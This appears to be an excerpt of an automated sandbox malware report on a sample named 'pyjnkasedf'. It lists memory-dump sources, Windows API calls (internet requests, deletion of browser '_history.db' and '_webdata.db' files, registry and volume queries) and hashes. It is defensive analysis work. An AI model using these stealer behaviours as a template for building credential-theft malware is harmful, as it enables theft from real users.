                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Open
                                                                                                                                                                                                                                                        • String ID: %s\%s$;srd
                                                                                                                                                                                                                                                        • API String ID: 71445658-2204126839
                                                                                                                                                                                                                                                        • Opcode ID: 5715ebb85eaa2e2521c68a54905a19c2296a1ce0cb5a182603e9e781fb9c67b6
                                                                                                                                                                                                                                                        • Instruction ID: 34b2e5b33d945873e4262bdd04268051d0e0910bc24028fb715f720baead2621
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5715ebb85eaa2e2521c68a54905a19c2296a1ce0cb5a182603e9e781fb9c67b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A0148B5601315AFD310EF18DC81E577BA8EBA8305F26092AF804D7322D730E9508B96
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00437645
                                                                                                                                                                                                                                                        • InternetOpenA.WININET ref: 004376E6
                                                                                                                                                                                                                                                        • InternetOpenA.WININET ref: 00437719
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InternetOpen$CreateDirectory
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1348255353-0
                                                                                                                                                                                                                                                        • Opcode ID: 052c9a79ab832bceee9035961e942eb2d2dc11a68678d48afda5f8c5773ba6e1
                                                                                                                                                                                                                                                        • Instruction ID: 3513c12a8c15c838cc1135bd79a6dff85458f3f9f28c4c03711eeead7ed662cc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 052c9a79ab832bceee9035961e942eb2d2dc11a68678d48afda5f8c5773ba6e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA71F972E002148BDB25DF6CDD81AA9B3F1BF88205F04457DE81AD3352DB34EA59CB5A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00424E63
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                                                                                                        • String ID: _history.db
                                                                                                                                                                                                                                                        • API String ID: 4033686569-1957735733
                                                                                                                                                                                                                                                        • Opcode ID: fd00fecaafae3e86381897c3d74b3fe11c3242cbc2d066c7f45a6775889170b6
                                                                                                                                                                                                                                                        • Instruction ID: 664919f2f9941c2fd957c57035283161ac0d3c89977a26e28749c9f04641afb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd00fecaafae3e86381897c3d74b3fe11c3242cbc2d066c7f45a6775889170b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0941FFB5A002098FCB14CF9CDC81AED77F5EF88205F18852DD815E7316EA74EA45CB54
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00424B4F
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                                                                                                        • String ID: _webdata.db
                                                                                                                                                                                                                                                        • API String ID: 4033686569-3003761311
                                                                                                                                                                                                                                                        • Opcode ID: 4247e945059a56421f7bdb963986c24b22db16c1a19c725eeef54cf5587253da
                                                                                                                                                                                                                                                        • Instruction ID: db05b673def4e00113b8eb769639559526f8ca15c5f04c734e0a0b142f73cbf0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4247e945059a56421f7bdb963986c24b22db16c1a19c725eeef54cf5587253da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B541F7B2A002199BCB45CF9CDC81ADD77F4BF89205B044039E815E7312EB34EA59CB99
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,?,?), ref: 0042E4DD
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                                                                        • String ID: vsrd
                                                                                                                                                                                                                                                        • API String ID: 3660427363-1852917856
                                                                                                                                                                                                                                                        • Opcode ID: 0c21e595cdf6e65eb1b6d17ee60a0a8cbb5b6d2b486b3466969e5a2303e3c7e0
                                                                                                                                                                                                                                                        • Instruction ID: 828b0b05ebcd48e66b62258adcb900599b6b0af2b19d4c7bd69145f2f8c69973
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c21e595cdf6e65eb1b6d17ee60a0a8cbb5b6d2b486b3466969e5a2303e3c7e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B21F6B6300204AFC304EF49EC80E2A77E5EBD9205B56493DF806C7362DA30EA599B56
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00437019
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                                        • API String ID: 2029273394-4073750446
                                                                                                                                                                                                                                                        • Opcode ID: 674938ccab7cac2d444df122baa3448a0591d92dbc237790a17c2382a634a6a4
                                                                                                                                                                                                                                                        • Instruction ID: 754bfdc8ec4a255fc54e4b3515d7cca242e2303ff96317dec8bf18d8bc877248
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 674938ccab7cac2d444df122baa3448a0591d92dbc237790a17c2382a634a6a4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E21B7719183429BC324DB64DC81AAAB3A8FFD4304F04861CE85997221E775F795CB96
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0043B1B9
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                                                                                                        • String ID: Xy'I
                                                                                                                                                                                                                                                        • API String ID: 2029273394-2702762207
                                                                                                                                                                                                                                                        • Opcode ID: ce83ed4ba58897fbe59314eb7d129d3d1d76a4be647b3bea7fe25ddbea4cfa22
                                                                                                                                                                                                                                                        • Instruction ID: d19c6fc699663f9f609ad4f0e67f3bf44e49985e7a60a2aa20ba03075b608dbe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce83ed4ba58897fbe59314eb7d129d3d1d76a4be647b3bea7fe25ddbea4cfa22
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3521B7B4E00759CFDB50CF69C981A9AB7F0FF49300F008669E959A7352E730A980CF95
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetVolumeInformationA.KERNEL32 ref: 0042E867
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationVolume
                                                                                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                                                                                        • API String ID: 2039140958-1037565863
                                                                                                                                                                                                                                                        • Opcode ID: 5a5f332a26c52b88cdf89dfde4ae2ee64c1a3e52609765cc6e5a0db2047a9748
                                                                                                                                                                                                                                                        • Instruction ID: f23951d0304724457adad8bec389d43a973e5f06e832e688f550b5e0590e5ce3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a5f332a26c52b88cdf89dfde4ae2ee64c1a3e52609765cc6e5a0db2047a9748
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB111CB05493508FC301EF29C889A1AFFE0AF95304F05C56EE494C7322C232D696CB56
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00418A39
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                                                                                                        • String ID: GET
                                                                                                                                                                                                                                                        • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                                                        • Opcode ID: 036adbb3e0e60d69c1de55e1dc3f9deffbd20c9ba7e8cf9293e752316893f974
                                                                                                                                                                                                                                                        • Instruction ID: 75a614c586498558a2b361bf9572b1714145ef71e51f341fab4e71487cad6604
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 036adbb3e0e60d69c1de55e1dc3f9deffbd20c9ba7e8cf9293e752316893f974
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 340113B5B002059FDB00CF98E8859BA77F9AB48211B004168E908E7322EBB5DD01CB55
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00418A39
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                                                                                                        • String ID: GET
                                                                                                                                                                                                                                                        • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                                                        • Opcode ID: 22df017da15e4282cccc6d4869e978c3dc2aeead230586518fe6d1657d1fc8ef
                                                                                                                                                                                                                                                        • Instruction ID: 360b509b851b883fea87794913567018529d20214be68e1510502b32d1773462
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22df017da15e4282cccc6d4869e978c3dc2aeead230586518fe6d1657d1fc8ef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B801E5B5B013059FD700CF98ED85DBA77F9EB48215B004568E908E7322EBB5DD05CB55
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,000000C7,?), ref: 00417251
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
